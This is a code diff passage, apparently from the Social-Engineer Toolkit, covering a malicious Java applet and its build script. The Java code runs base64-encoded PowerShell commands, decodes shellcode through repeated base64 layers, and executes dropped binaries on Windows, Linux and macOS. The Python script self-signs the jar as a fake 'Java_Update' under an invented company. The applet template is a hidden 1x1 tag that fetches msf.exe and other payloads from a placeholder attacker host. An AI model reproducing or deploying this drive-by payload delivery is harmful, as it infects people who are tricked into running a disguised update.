if (fourthParm.length() > 3)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + fourthParm);
}
}
else if (arch.contains("i"))
{
// this will be 32 bit
if (thirdParm.length() > 3)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + thirdParm);
}
}
}
}
// if we aren't using the shellcodeexec attack
if (nextParm.length() < 3)
{
// if we turned on binary dropping
if (sixthParm.length() > 2)
{
// if we are using the SET interactive shell
if (fifthParm.length() > 2)
{
// logfile stuff here 42logfile42.tmp
// write out a temp file if we aren't going to pass parameters
f = Runtime.getRuntime().exec("cmd.exe /c \"" + "echo " + fifthParm + " > " + writedir + "42logfile.tmp" + "\"");
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + fifthParm + "\"");
}
// if we aren't using SET interactive shell
if (fifthParm.length() < 2)
{
f = Runtime.getRuntime().exec("cmd.exe /c " + pfad);
//f.waitFor();
}
}
}
// if we are using shellcode exec
if (nextParm.length() > 3)
{
if (sixthParm.length() > 2)
{
// all parameters are base64 encoded, this will decode for us and pass the decoded strings
BASE64Decoder decoder = new BASE64Decoder();
byte[] decoded = decoder.decodeBuffer(nextParm);
// decode again
String decoded_string = new String(decoded);
String decoded_string_2 = new String(decoder.decodeBuffer(decoded_string));
// again
String decoded_string_3 = new String(decoder.decodeBuffer(decoded_string_2));
// again
String decoded_string_4 = new String(decoder.decodeBuffer(decoded_string_3));
// again
String decoded_string_5 = new String(decoder.decodeBuffer(decoded_string_4));
// again
String decoded_string_6 = new String(decoder.decodeBuffer(decoded_string_5));
// again
String decoded_string_7 = new String(decoder.decodeBuffer(decoded_string_6));
// again
String decoded_string_8 = new String(decoder.decodeBuffer(decoded_string_7));
// again
String decoded_string_9 = new String(decoder.decodeBuffer(decoded_string_8));
// again
String decoded_string_10 = new String(decoder.decodeBuffer(decoded_string_9));
// last one
String decoded_string_11 = new String(decoder.decodeBuffer(decoded_string_10));
PrintStream out = null;
String randomfile = Long.toString(Math.abs(r.nextLong()), 36);
try {
out = new PrintStream(new FileOutputStream(writedir + randomfile));
out.print(decoded_string_11);
}
finally {
if (out != null) out.close();
}
// this is if we are using multipyinjector
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + writedir + randomfile + " " + eightParm);
// this runs the single instance of shellcodeexec, pyinjector, or a binary
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + decoded_string_11 + "\"");
// f.waitFor();
}
}
// delete old file
// (new File(pfad)).delete();
}
else // if not windows then use linux/osx/etc.
{
// change permisisons to execute
Process process1 = Runtime.getRuntime().exec("/bin/chmod 755 " + pfad);
process1.waitFor();
//and execute
f = Runtime.getRuntime().exec(pfad);
// wait for termination
f.waitFor();
// delete old file
(new File(pfad)).delete();
}
initialized = this;
} catch(IOException e) {
e.printStackTrace();
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
}

35
src/webattack/java_applet/jar_file.py Normal file
View file

@ -0,0 +1,35 @@
#!/usr/bin/python
#
# simple jar file
#
import subprocess
import os
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("javac Java.java", shell=True).wait()
subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait()
print "[*] Jar file exported as Java_Update.jar"
pause = raw_input("Sign and import the new java file into SET? [yes|no]")
if pause == "yes" or pause == "y":
print """
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
print """*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***"""
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Update.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"

2
src/webattack/web_clone/applet.database
View file

@ -1 +1 @@
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="separate_jvm" value="true"></applet>
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>